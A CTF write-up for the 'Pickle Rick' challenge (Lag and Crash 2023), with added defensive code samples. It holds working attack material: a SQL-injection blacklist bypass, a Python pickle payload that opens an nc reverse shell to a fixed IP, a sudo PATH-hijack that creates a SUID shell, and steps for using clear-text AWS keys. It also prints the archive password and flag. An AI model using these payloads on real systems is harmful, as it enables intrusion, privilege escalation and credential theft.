Kabinet's GitBook
Authored > Lag and Crash 2023
Pickle Rick

Difficulty: Hard
Points: X
Solves: X

Description

Rick has turned himself into a pickle. Can you find him before it's too late...

File is temporarily hosted at https://drive.google.com/file/d/1ZULGK4p7cJQHNabmDHdtki-g1xNfHu0f

MD5: ba83987433851f2101f846e89b9b99f6 SHA256: 1dd4388022be3946a72dd3fcf2603896396a8574d5dbe214f9ecf1b0a8b2db92 Password: &y9PBYf8gZ^996s9

I would suggest giving participants the link to download the file before the CTF starts, and only releasing the password after the CTF has started.

Solution

  1. SQL injection bypassing the blacklist

"oR"2"LiKE"2
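Why a keyword blacklist is the wrong defence here, and what replaces it, as an added example (not code from the challenge). The in-memory users table, the byte-for-byte blacklist and the function names are constructed for the demonstration; the payload is the one from the step above. Lower-casing the input before matching would catch this particular payload, but comments, alternate whitespace and encodings give the next bypass; a parameterized query removes the problem class because the input never becomes SQL text.

```python
import sqlite3
from typing import Optional

# Constructed demo data, not the challenge's database.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('rick', 'wubba-lubba')")
    conn.commit()
    return conn

# Assumption: a keyword blacklist matched exactly as written, the weak defence
# that the mixed-case payload on this page slips past.
BLACKLIST = ("or", "like", "union", "select", "--")

def passes_blacklist(value: str) -> bool:
    """True when none of the blacklisted tokens appears exactly as written."""
    return not any(token in value for token in BLACKLIST)

def build_query_unsafe(username: str, password: str) -> str:
    """The vulnerable pattern: filter, then splice the input into the SQL text.
    Returned as a string so the reader can see what the filter let through."""
    if not (passes_blacklist(username) and passes_blacklist(password)):
        raise ValueError("blocked by blacklist")
    return f'SELECT 1 FROM users WHERE username="{username}" AND password="{password}"'

def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: the SQL text is fixed and the input only ever travels as bound values."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    payload = '"oR"2"LiKE"2'
    print(build_query_unsafe(payload, payload))   # the blacklist did not fire
    conn = make_db()
    print(login_parameterized(conn, payload, payload))          # False
    print(login_parameterized(conn, "rick", "wubba-lubba"))     # True
```

With the bound-parameter version, the payload is compared literally against the username column and matches nothing, regardless of how the keywords are cased.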
  2. Python insecure deserialization with the pickle module for RCE

Sample payload:

import pickle
import os

class RCE:
    # pickle calls __reduce__ when serialising; the (callable, args) pair it
    # returns is invoked by the unpickler, here os.system with a reverse shell.
    def __reduce__(self):
        cmd = 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.174.136 4444 >/tmp/f'
        return os.system, (cmd,)

if __name__ == '__main__':
    # Serialise the object; the command runs when the target unpickles the file.
    pickled = pickle.dumps(RCE())

    with open("pickled_data.pickle", "wb") as f:
        f.write(pickled)
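How the shop should have loaded that file, as an added example that is not part of the challenge code. The pattern is the restricted unpickler from the Python documentation: override find_class so that only an allow-list of globals resolves, which is exactly the lookup a __reduce__-based payload relies on to reach os.system. The allow-list contents, the Probe class and the function names are assumptions for the demonstration; Probe uses the same __reduce__ trick as the payload above but names os.getcwd, so running it unrestricted only returns the working directory.

```python
import io
import os
import pickle

# Assumption: the application only ever serialises plain containers and scalars,
# so these are the only globals a shop pickle is allowed to reference.
SAFE_GLOBALS = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

class RestrictedUnpickler(pickle.Unpickler):
    """Refuses any GLOBAL/STACK_GLOBAL lookup that is not on the allow-list,
    which is where a reduce-based payload names the callable it wants run."""

    def find_class(self, module: str, name: str):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(data: bytes):
    """Drop-in replacement for pickle.loads that goes through the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Probe:
    """Harmless stand-in for the page's RCE class (constructed for this demo):
    same __reduce__ trick, but the callable is os.getcwd, so a plain
    pickle.loads merely returns the working directory."""

    def __reduce__(self):
        return (os.getcwd, ())

def is_blocked(data: bytes) -> bool:
    """True when the restricted loader refuses the pickle."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False

if __name__ == "__main__":
    benign = pickle.dumps({"order": 1, "items": ["pickle"]})
    hostile = pickle.dumps(Probe())
    print(safe_loads(benign))
    print("plain loads ran the callable:", pickle.loads(hostile) == os.getcwd())
    print("restricted loader blocked it:", is_blocked(hostile))
```

The allow-list is the important design choice: a deny-list of "dangerous" modules fails the same way the SQL blacklist above does, because the standard library has many other callables that execute code. Where the data is under the application's control, serialising to JSON instead of pickle avoids the problem entirely.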
  3. Binary with the SUID bit in the /opt directory: /opt/clean_pickle.sh

Running sudo -l shows the user can run /opt/clean_pickle.sh via sudo with the SETENV and NOPASSWD tags.

Exploit script:

echo "cp /bin/sh /tmp/qaz; chmod +s /tmp/qaz" > /tmp/rm
sudo PATH=/tmp:$PATH /opt/clean_pickle.sh

/tmp/qaz -p
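What the privileged helper should have done instead, as an added example that is not the challenge's clean_pickle.sh. The weakness above is that the script resolves rm through whatever PATH the caller passes in (SETENV lets sudo keep it). The hardened approach is to ignore the inherited environment: resolve tools only through a fixed trusted path, call them by absolute path, and hand the child a scrubbed environment. TRUSTED_PATH and the function names are assumptions for the demonstration; resolve_inherited mirrors the unhardened behaviour so the two can be compared.

```python
import os
import shutil
import subprocess
from typing import Optional

# Assumption: the directories a privileged helper should trust, instead of the
# PATH a caller can inject through sudo's SETENV.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

def resolve_inherited(cmd: str, path: Optional[str] = None) -> Optional[str]:
    """How an unhardened script finds `cmd`: first match on the caller's PATH."""
    search = path if path is not None else os.environ.get("PATH", "")
    return shutil.which(cmd, path=search)

def resolve_trusted(cmd: str) -> Optional[str]:
    """How a hardened helper finds `cmd`: only TRUSTED_PATH is consulted,
    no matter what the environment says."""
    return shutil.which(cmd, path=TRUSTED_PATH)

def remove_file_safely(target: str) -> int:
    """Delete `target` with an absolute rm and a scrubbed environment, so neither
    PATH nor any other inherited variable can redirect the call."""
    rm = resolve_trusted("rm")
    if rm is None:
        raise FileNotFoundError("rm not found on the trusted path")
    proc = subprocess.run([rm, "-f", "--", target], env={"PATH": TRUSTED_PATH}, check=False)
    return proc.returncode

if __name__ == "__main__":
    print("inherited PATH resolves rm to:", resolve_inherited("rm"))
    print("trusted PATH resolves rm to:", resolve_trusted("rm"))
```

The same idea applies to the shell version of the helper: set PATH explicitly at the top of the script and use absolute paths for every external command. On the sudoers side, the SETENV tag should not be granted for a rule like this one, since it hands the caller control of the environment the script runs in.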
  4. Pivoting to the AWS cloud

In /root/.aws/credentials there are clear-text IAM credentials for AWS. Enumerate their permissions and list the S3 files.

[default]
aws_access_key_id = redacted
aws_secret_access_key = redacted
  5. Get the flag :D

aws configure
AWS Access Key ID [****************E5EW]: redacted
AWS Secret Access Key [****************O+wn]: redacted
Default region name [None]: 
Default output format [None]: 

aws s3 ls
2023-02-13 16:12:01 lnc-pickle-shop

aws s3 ls lnc-pickle-shop
2023-02-13 16:12:56         26 flag.txt

aws s3 cp  s3://lnc-pickle-shop/flag.txt flag.txt
download: s3://lnc-pickle-shop/flag.txt to ./flag.txt            

cat flag.txt

Flag

LNC2023{1m_p1ckl3_r1111ck}
